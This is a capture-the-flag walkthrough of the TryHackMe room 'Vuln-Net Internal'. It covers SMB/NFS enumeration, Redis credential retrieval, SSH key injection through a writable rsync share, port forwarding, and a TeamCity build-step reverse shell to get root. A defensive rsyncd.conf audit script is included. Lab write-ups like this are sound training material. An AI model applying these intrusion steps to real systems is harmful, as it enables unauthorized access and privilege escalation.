Vuln-Net Internal TryHackMe

Eslam Omar
Published in System Weakness
4 min read · Mar 4, 2024

Hello friends, today I want to talk about how to solve this room on TryHackMe.

Let’s get started.

Enumeration

First I’ll use Masscan to scan for open ports on our target.

sudo masscan -p 1-65535 --interface tun0 --rate 1000 10.10.23.179

Okay, let’s use Nmap to scan these services.

sudo nmap -sV -sC -sS -p 2049,54515,445,139,111,42429,22,6379,33859,37729,873 -oA scan/result 10.10.23.179

SMB Service

We can log in as a guest user to the Samba service, so let’s log in and see if we find anything.

smbclient -N -L //10.10.23.179
smbclient -N //10.10.23.179/shares

I’ll download the files from these directories to see what is inside them.

get name_file.txt # download the file to the attacking VM

I found the first flag. Let’s dig deeper.

NFS Service

showmount -e $IP

Let’s mount this exported directory on the attacking VM.

mkdir mount
sudo mount -t nfs $IP:/opt/conf mount

After searching, I found the configuration file for the Redis database. Let’s look at it.

cat redis.conf | grep -i "pass"

Great, I found the password. Let’s see what we can do with it.

Redis

Now that we have a password, let’s log in to the Redis database and see what we can do.

redis-cli -h $IP -p 6379 -a "B65Hx562*****" # log in with the password
keys * # Returns all key names
get "internal flag" # Returns the value stored under the key
type name_keys # Returns the type of the key
lrange authlist 0 -1 # Returns every element of the list (index 0 to the last)

Now we have something base64-encoded. Let’s decode it.

echo "Value_encoded" | base64 -d

Okay, now we have these credentials. Let’s see what we can do with them.

Rsync service

Rsync is a Linux utility that can synchronize files and directories remotely or locally.

rsync -av --list-only rsync://10.10.52.162 # Listing a shared folder
rsync -av rsync://rsync-connect@10.10.52.162/files ./rsync # Copying files from a shared folder

Now we have the user flag. Since the share is writable, we can upload an authorized_keys file to connect via SSH.

ssh-keygen -t ed25519 -f ./id_ed25519 # generate a key pair; the private key is used for SSH below
cp ./id_ed25519.pub ./authorized_keys # the public key becomes the authorized_keys file
rsync -ahv ./authorized_keys rsync://rsync-connect@10.10.52.162/files/sys-internal/.ssh/authorized_keys --inplace --no-o --no-g # upload it into the user's .ssh directory
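From the defender's side, this foothold works only because the rsync module accepts writes from unauthenticated clients. As an added example (not code from the original walkthrough), here is a small Python audit of an rsyncd.conf that flags such modules; the sample configuration and its module names are constructed assumptions.

```python
# Added defensive check (not from the walkthrough): audit rsyncd.conf for modules
# an anonymous client can write to, the misconfiguration behind the authorized_keys upload.
# Constructed sample rsyncd.conf, not the room's real file.
SAMPLE_RSYNCD_CONF = """\
uid = nobody
use chroot = yes

[files]
    path = /home
    read only = no

[backups]
    path = /srv/backups
    read only = yes
    auth users = backup
    secrets file = /etc/rsyncd.secrets
"""

def _is_true(value):
    # rsyncd.conf booleans accept yes/no, true/false and 1/0
    return value.strip().lower() in ("yes", "true", "1")

def parse_rsyncd_conf(text):
    """Return {module: {key: value}}; global keys act as per-module defaults."""
    global_params, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            modules[current] = {}
        elif "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            (modules[current] if current else global_params)[key.lower()] = value
    return {name: {**global_params, **params} for name, params in modules.items()}

def audit_rsyncd(modules):
    """Flag modules an unauthenticated client can read from or write to."""
    findings = []
    for name, p in modules.items():
        anonymous = not p.get("auth users")
        writable = not _is_true(p.get("read only", "yes"))
        if anonymous and writable:
            findings.append(f"[{name}] ({p.get('path', '?')}) is writable without 'auth users': "
                            "any client can push files such as .ssh/authorized_keys")
        elif anonymous:
            findings.append(f"[{name}] ({p.get('path', '?')}) allows anonymous read access")
    return findings
```

Run it against a real /etc/rsyncd.conf by reading the file into `parse_rsyncd_conf`; any module reported as writable without `auth users` should be made read-only or protected with `auth users` and a `secrets file`.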

Foothold

ssh -i id_ed25519 sys-internal@10.10.52.162

After some enumeration, I found this.

ss -ltnp

Let’s forward the port to our machine; after that, we can visit this website.

ssh -i id_ed25519 sys-internal@10.10.52.162 -L 631:127.0.0.1:631

After looking around this website I didn’t find anything interesting. After forwarding another internal service to my machine, I found this website.

ssh -i id_ed25519 sys-internal@10.10.52.162 -L 8111:127.0.0.1:8111

If you look at the version, you will find this website runs an old version. Let’s dig deeper.

I can access files on this website, so let’s search through them.

After reading this file I found a superuser token. I logged in with that token without a username, and then I could access the admin dashboard.

Now that we have superuser access, we create a new project > build configuration > build step and add a Python script to get a reverse shell.

Now we are root.

Thanks for reading.